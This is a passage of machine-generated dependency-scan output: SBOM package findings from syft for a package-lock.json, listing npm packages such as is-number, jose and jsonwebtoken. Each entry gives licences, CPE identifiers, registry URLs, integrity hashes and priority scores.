1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f5c20bc28d065782 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: is-number 7.0.0' + title: is-number 7.0.0 + description: 'Package discovered: is-number 7.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 19d61645d0264090 + name: is-number + version: 7.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:is-number:is-number:7.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is-number:is_number:7.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_number:is-number:7.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_number:is_number:7.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is-number:7.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is_number:7.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/is-number@7.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz + integrity: sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 1ec1886de995b530 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: is-stream 2.0.1' + title: is-stream 2.0.1 + description: 'Package discovered: is-stream 2.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0d47a7f43264d12f + name: is-stream + version: 2.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:is-stream:is-stream:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is-stream:is_stream:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_stream:is-stream:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_stream:is_stream:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is-stream:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is_stream:2.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/is-stream@2.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz + integrity: sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: cd8dbd159ce77812 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: is-url 1.2.4' + title: is-url 1.2.4 + description: 'Package discovered: is-url 1.2.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0055323086e6dbe0 + name: is-url + version: 1.2.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:is-url:is-url:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is-url:is_url:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_url:is-url:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_url:is_url:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is-url:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is_url:1.2.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/is-url@1.2.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/is-url/-/is-url-1.2.4.tgz + integrity: sha512-ITvGim8FhRiYe4IQ5uHSkj7pVaPDrCTkNd3yq3cV7iZAcJdHTUMPMEHcqSOy9xZ9qFenQCvi+2wjH9a1nXqHww== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 25f78dcaa669e646 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: isarray 1.0.0' + title: isarray 1.0.0 + description: 'Package discovered: isarray 1.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 14ac0fadd6b69d11 + name: isarray + version: 1.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:isarray:isarray:1.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/isarray@1.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz + integrity: sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b4f550816fd1d6a8 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: isexe 2.0.0' + title: isexe 2.0.0 + description: 'Package discovered: isexe 2.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 18556628c2ed871d + name: isexe + version: 2.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:isexe:isexe:2.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/isexe@2.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz + integrity: sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 399923db78bd2f5d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: jackspeak 3.4.3' + title: jackspeak 3.4.3 + description: 'Package discovered: jackspeak 3.4.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 668b76a592331d7f + name: jackspeak + version: 3.4.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BlueOak-1.0.0 + spdxExpression: BlueOak-1.0.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:jackspeak:jackspeak:3.4.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/jackspeak@3.4.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz + integrity: sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw== + dependencies: + '@isaacs/cliui': ^8.0.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c7be600d2bcad0a1 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: jay-peg 1.1.1' + title: jay-peg 1.1.1 + description: 'Package discovered: jay-peg 1.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c5304af01a3223ed + name: jay-peg + version: 1.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:jay-peg:jay-peg:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:jay-peg:jay_peg:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:jay_peg:jay-peg:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:jay_peg:jay_peg:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:jay:jay-peg:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:jay:jay_peg:1.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/jay-peg@1.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/jay-peg/-/jay-peg-1.1.1.tgz + integrity: sha512-D62KEuBxz/ip2gQKOEhk/mx14o7eiFRaU+VNNSP4MOiIkwb/D6B3G1Mfas7C/Fit8EsSV2/IWjZElx/Gs6A4ww== + dependencies: + restructure: ^3.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 5b403253da2d4e5e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: jiti 1.21.7' + title: jiti 1.21.7 + description: 'Package discovered: jiti 1.21.7' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a3b57ee8874ce4dc + name: jiti + version: 1.21.7 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:jiti:jiti:1.21.7:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/jiti@1.21.7 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/jiti/-/jiti-1.21.7.tgz + integrity: sha512-/imKNG4EbWNrVjoNC/1H5/9GFy+tqjGBHCaSsN+P2RnPqjsLmv6UD3Ej+Kj8nBWaRAwyk7kK5ZUc+OEatnTR3A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: feda20014c18c42e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: jose 4.15.9' + title: jose 4.15.9 + description: 'Package discovered: jose 4.15.9' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0246497cf4065c27 + name: jose + version: 4.15.9 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:jose_project:jose:4.15.9:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/jose@4.15.9 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/jose/-/jose-4.15.9.tgz + integrity: sha512-1vUQX+IdDMVPj4k8kOxgUqlcK518yluMuGZwqlr44FS1ppZB/5GWh4rZG89erpOBOJjU/OBsnCVFfapsRz6nEA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ad953d39f31a884d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: js-beautify 1.15.4' + title: js-beautify 1.15.4 + description: 'Package discovered: js-beautify 1.15.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: eb8b761fb0d3a989 + name: js-beautify + version: 1.15.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:js-beautify:js-beautify:1.15.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js-beautify:js_beautify:1.15.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js_beautify:js-beautify:1.15.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js_beautify:js_beautify:1.15.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js:js-beautify:1.15.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js:js_beautify:1.15.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/js-beautify@1.15.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/js-beautify/-/js-beautify-1.15.4.tgz + integrity: sha512-9/KXeZUKKJwqCXUdBxFJ3vPh467OCckSBmYDwSK/EtV090K+iMJ7zx2S3HLVDIWFQdqMIsZWbnaGiba18aWhaA== + dependencies: + config-chain: ^1.1.13 + editorconfig: ^1.0.4 + glob: ^10.4.2 + js-cookie: ^3.0.5 + nopt: ^7.2.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: cb31e7fb1004281e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: js-cookie 3.0.5' + title: js-cookie 3.0.5 + description: 'Package discovered: js-cookie 3.0.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 07274f4b8a4d661e + name: js-cookie + version: 3.0.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:js-cookie:js-cookie:3.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js-cookie:js_cookie:3.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js_cookie:js-cookie:3.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js_cookie:js_cookie:3.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js:js-cookie:3.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js:js_cookie:3.0.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/js-cookie@3.0.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/js-cookie/-/js-cookie-3.0.5.tgz + integrity: sha512-cEiJEAEoIbWfCZYKWhVwFuvPX1gETRYPw6LlaTKoxD3s2AkXzkCjnp6h0V77ozyqj0jakteJ4YqDJT830+lVGw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4db17fad932f2d8e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: js-md5 0.8.3' + title: js-md5 0.8.3 + description: 'Package discovered: js-md5 0.8.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d30adc61a99cb3ed + name: js-md5 + version: 0.8.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:js-md5:js-md5:0.8.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js-md5:js_md5:0.8.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js_md5:js-md5:0.8.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js_md5:js_md5:0.8.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js:js-md5:0.8.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js:js_md5:0.8.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/js-md5@0.8.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/js-md5/-/js-md5-0.8.3.tgz + integrity: sha512-qR0HB5uP6wCuRMrWPTrkMaev7MJZwJuuw4fnwAzRgP4J4/F8RwtodOKpGp4XpqsLBFzzgqIO42efFAyz2Et6KQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 88f0214bae1b08f0 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: js-tokens 4.0.0' + title: js-tokens 4.0.0 + description: 'Package discovered: js-tokens 4.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 132a500346fcea0c + name: js-tokens + version: 4.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:js-tokens:js-tokens:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js-tokens:js_tokens:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js_tokens:js-tokens:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js_tokens:js_tokens:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js:js-tokens:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:js:js_tokens:4.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/js-tokens@4.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz + integrity: sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d7056e806f2cd1e3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: json-bigint 1.0.0' + title: json-bigint 1.0.0 + description: 'Package discovered: json-bigint 1.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f29c1976ad3d8cb0 + name: json-bigint + version: 1.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:json-bigint_project:json-bigint:1.0.0:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/json-bigint@1.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/json-bigint/-/json-bigint-1.0.0.tgz + integrity: sha512-SiPv/8VpZuWbvLSMtTDU8hEfrZWg/mH/nV/b4o0CYbSxu1UIQPLdwKOCIyLQX+VIPO5vrLX3i8qtqFyhdPSUSQ== + dependencies: + bignumber.js: ^9.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2a5374383b13cd28 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: jsonwebtoken 9.0.3' + title: jsonwebtoken 9.0.3 + description: 'Package discovered: jsonwebtoken 9.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2ebcc52db7d200cb + name: jsonwebtoken + version: 9.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:auth0:jsonwebtoken:9.0.3:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/jsonwebtoken@9.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/jsonwebtoken/-/jsonwebtoken-9.0.3.tgz + integrity: sha512-MT/xP0CrubFRNLNKvxJ2BYfy53Zkm++5bX9dtuPbqAeQpTVe0MQTFhao8+Cp//EmJp244xt6Drw/GVEGCUj40g== + dependencies: + jws: ^4.0.1 + lodash.includes: ^4.3.0 + lodash.isboolean: ^3.0.3 + lodash.isinteger: ^4.0.4 + lodash.isnumber: ^3.0.3 + lodash.isplainobject: ^4.0.6 + lodash.isstring: ^4.0.1 + lodash.once: ^4.0.0 + ms: ^2.1.1 + semver: ^7.5.4 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 835e252fefb47867 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: jwa 2.0.1' + title: jwa 2.0.1 + description: 'Package discovered: jwa 2.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 154697ca4fb19b8b + name: jwa + version: 2.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:jwa:jwa:2.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/jwa@2.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/jwa/-/jwa-2.0.1.tgz + integrity: sha512-hRF04fqJIP8Abbkq5NKGN0Bbr3JxlQ+qhZufXVr0DvujKy93ZCbXZMHDL4EOtodSbCWxOqR8MS1tXA5hwqCXDg== + dependencies: + buffer-equal-constant-time: ^1.0.1 + ecdsa-sig-formatter: 1.0.11 + safe-buffer: ^5.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + 